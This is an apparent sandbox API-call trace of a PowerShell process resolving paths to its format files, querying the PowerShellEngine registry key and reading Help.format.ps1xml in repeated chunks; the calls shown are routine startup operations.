	[0400.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.110] SetErrorMode (uMode=0x1) returned 0x1
	[0400.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0400.110] SetErrorMode (uMode=0x1) returned 0x1
	[0400.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.110] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x1c8) returned 0x0
	[0400.110] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0400.110] CoTaskMemAlloc (cb=0x5a) returned 0x1885d0
	[0400.110] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1885d0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0400.110] CoTaskMemFree (pv=0x1885d0) 
	[0400.110] RegCloseKey (hKey=0x1c8) returned 0x0
	[0400.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.113] VirtualQuery (in: lpAddress=0x28bfa0, lpBuffer=0x28ce60, dwLength=0x30 | out: lpBuffer=0x28ce60*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.114] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xb097258e, Data2=0xebbf, Data3=0x4665, Data4=([0]=0xa8, [1]=0x7, [2]=0xaf, [3]=0x92, [4]=0x3e, [5]=0x4e, [6]=0xf1, [7]=0xa3))) returned 0x0
	[0400.115] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.117] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xc5030266, Data2=0xd94e, Data3=0x42e4, Data4=([0]=0xa3, [1]=0xf7, [2]=0x3c, [3]=0x4a, [4]=0x2, [5]=0x3b, [6]=0x35, [7]=0x36))) returned 0x0
	[0400.118] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7408cca2, Data2=0x3a12, Data3=0x4fea, Data4=([0]=0xb9, [1]=0xaa, [2]=0x21, [3]=0x22, [4]=0xa3, [5]=0x5c, [6]=0xc5, [7]=0x4c))) returned 0x0
	[0400.119] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x591feb0, Data2=0x9bbe, Data3=0x49af, Data4=([0]=0x89, [1]=0x66, [2]=0x2f, [3]=0x8b, [4]=0x21, [5]=0x9e, [6]=0x5b, [7]=0x19))) returned 0x0
	[0400.119] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.120] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.120] SetErrorMode (uMode=0x1) returned 0x1
	[0400.120] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0400.120] GetFileType (hFile=0x1c8) returned 0x1
	[0400.120] SetErrorMode (uMode=0x1) returned 0x1
	[0400.121] GetFileType (hFile=0x1c8) returned 0x1
	[0400.121] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.122] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.122] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.122] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.123] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.123] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.123] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.123] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.124] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.124] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.125] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.125] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.125] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.125] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.125] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.126] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.127] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.127] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.611] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.611] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.611] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.612] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.612] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.612] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.612] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.612] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.613] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.613] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.613] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.613] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.613] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.613] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.615] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.615] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.615] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.616] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.616] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.616] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.616] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.616] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.619] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0xf37, lpOverlapped=0x0) returned 1
	[0400.620] ReadFile (in: hFile=0x1c8, lpBuffer=0x36235f7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x36235f7*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0400.620] ReadFile (in: hFile=0x1c8, lpBuffer=0x3623f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3623f58*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0400.620] CloseHandle (hObject=0x1c8) returned 1
	[0400.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.620] SetErrorMode (uMode=0x1) returned 0x1
	[0400.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0400.620] SetErrorMode (uMode=0x1) returned 0x1
	[0400.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.620] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x1c8) returned 0x0
	[0400.620] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0400.620] CoTaskMemAlloc (cb=0x5a) returned 0x1885d0
